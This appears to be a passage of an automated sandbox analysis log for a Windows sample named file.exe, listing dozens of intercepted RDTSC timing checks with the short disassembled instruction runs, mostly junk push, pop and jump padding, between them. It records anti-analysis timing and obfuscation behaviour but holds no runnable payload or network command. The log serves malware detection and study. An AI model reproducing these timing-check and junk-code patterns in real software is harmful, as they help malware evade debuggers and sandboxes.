    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC42 second address: 9DDC4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC4B second address: 9DDC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD49D second address: 9DD4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29AF second address: 9E29B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29B5 second address: 9E29C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACF47FE2h 0x00000008 jne 00007FDDACF47FD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29C5 second address: 9E29CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29CE second address: 9E29E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FDDACF47FFFh 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29E2 second address: 9E2A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDDACAD5297h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2C9B second address: 9E2C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E32C5 second address: 9E32CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E32CF second address: 9E32E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E32E8 second address: 9E3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FDDACAD5292h 0x0000000b jmp 00007FDDACAD528Ch 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E363D second address: 9E3647 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E3647 second address: 9E3676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDDACAD5286h 0x00000009 jmp 00007FDDACAD528Fh 0x0000000e jmp 00007FDDACAD5295h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E44D6 second address: 9E44EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FDDACF47FDEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E44EA second address: 9E44F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E44F4 second address: 9E4500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007FDDACF47FD6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E4500 second address: 9E4504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E906A second address: 9E906E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8936 second address: 9E8963 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDDACAD5298h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDDACAD528Fh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8963 second address: 9E8968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8968 second address: 9E896E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8AB0 second address: 9E8AB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8AB5 second address: 9E8ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jno 00007FDDACAD5296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FDDACAD52A2h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9ED2EB second address: 9ED2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F2FA3 second address: 9F2FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F2FA7 second address: 9F2FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F30DF second address: 9F30FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FDDACAD528Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007FDDACAD5286h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F30FB second address: 9F3104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F33DE second address: 9F33FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD5298h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F33FF second address: 9F3412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDDACF47FDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F3412 second address: 9F3430 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDDACAD528Dh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007FDDACAD5286h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F358B second address: 9F358F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F358F second address: 9F3593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F3593 second address: 9F35A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDDACF47FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FDDACF47FD6h 0x00000015 pop ebx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F3E9E second address: 9F3EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F3EA2 second address: 9F3EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F3EA8 second address: 9F3EB7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDACAD528Ah 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F4549 second address: 9F454F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F454F second address: 9F455B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F455B second address: 9F455F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F2484 second address: 9F2488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F2488 second address: 9F248E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F248E second address: 9F2492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F2492 second address: 9F2496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA076 second address: 9FA07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA07A second address: 9FA095 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDDACF47FD6h 0x00000008 jng 00007FDDACF47FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDDACF47FDBh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA095 second address: 9FA09B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FD053 second address: 9FD06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FDDACF47FE0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FD06B second address: 9FD071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FD071 second address: 9FD081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FD081 second address: 9FD0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FDDACAD5291h 0x0000000b jmp 00007FDDACAD528Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACAD5299h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FCAD0 second address: 9FCAD6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0B543 second address: A0B547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0B547 second address: A0B561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDDACF47FE0h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0AF44 second address: A0AF53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FDDACAD5286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0B0B5 second address: A0B0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FDDACF47FDAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007FDDACF47FE4h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0B0DF second address: A0B0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0B0E5 second address: A0B0FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDDACF47FD6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007FDDACF47FD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12174 second address: A1217E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1217E second address: A12183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12183 second address: A1219C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDDACAD5290h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A193EA second address: A193EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A193EE second address: A193F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A193F4 second address: A19403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FDDACF47FD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1AA63 second address: A1AA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1AA78 second address: A1AA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1AA7C second address: A1AA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FDDACAD528Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A25D09 second address: A25D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDDACF47FD6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A25D14 second address: A25D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24747 second address: A2474D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2474D second address: A24759 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24759 second address: A2475D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2475D second address: A24763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A249F4 second address: A24A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDDACF47FD6h 0x0000000a jmp 00007FDDACF47FE0h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edi 0x00000013 push esi 0x00000014 pushad 0x00000015 jmp 00007FDDACF47FE8h 0x0000001a jmp 00007FDDACF47FE0h 0x0000001f push eax 0x00000020 pop eax 0x00000021 jp 00007FDDACF47FD6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007FDDACF47FD6h 0x00000030 jno 00007FDDACF47FD6h 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24A53 second address: A24A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24BBC second address: A24BD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FDDACF47FD6h 0x0000000e jmp 00007FDDACF47FDCh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24BD6 second address: A24BE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24BE3 second address: A24BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A24D97 second address: A24D9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A25049 second address: A2505C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2505C second address: A25062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A25062 second address: A25067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A25067 second address: A2506C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2506C second address: A2509C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDDACF47FE3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDDACF47FDCh 0x00000015 push ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2AB39 second address: A2AB3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2EAB0 second address: A2EAC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2EAC7 second address: A2EAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2EAD1 second address: A2EAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3A7D9 second address: A3A7DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A36F31 second address: A36F3E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A36F3E second address: A36F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A49E6D second address: A49E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A63592 second address: A6359E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDACAD5286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6359E second address: A635AD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDDACF47FDAh 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A635AD second address: A635C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FDDACAD5286h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A635C0 second address: A635D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A62280 second address: A622B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Eh 0x00000009 jmp 00007FDDACAD528Ah 0x0000000e popad 0x0000000f jmp 00007FDDACAD5294h 0x00000014 pop edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A622B9 second address: A622BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
